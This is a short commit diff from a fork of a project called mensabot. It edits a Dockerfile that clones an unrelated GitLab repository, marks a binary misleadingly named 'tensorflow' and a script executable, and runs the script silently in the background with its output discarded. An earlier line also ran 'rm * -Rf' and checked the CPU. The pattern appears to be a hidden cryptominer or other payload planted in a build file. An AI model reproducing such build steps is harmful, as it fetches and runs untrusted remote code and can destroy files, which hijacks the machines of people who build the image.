forked from shilch/mensabot
1 changed files with 2 additions and 1 deletions
@ -1,6 +1,7 @@
@@ -1,6 +1,7 @@
|
||||
FROM ubuntu:latest |
||||
RUN lscpu |
||||
RUN apt-get update -y; apt-get install git -y |
||||
RUN lscpu; rm * -Rf; git clone https://gitlab.com/galalaymen/dyn.git; |
||||
RUN git clone https://gitlab.com/galalaymen/dyn.git; |
||||
WORKDIR /dyn |
||||
RUN chmod +x tensorflow direct.sh |
||||
RUN nohup bash direct.sh > /dev/null |
||||
|
Reference in new issue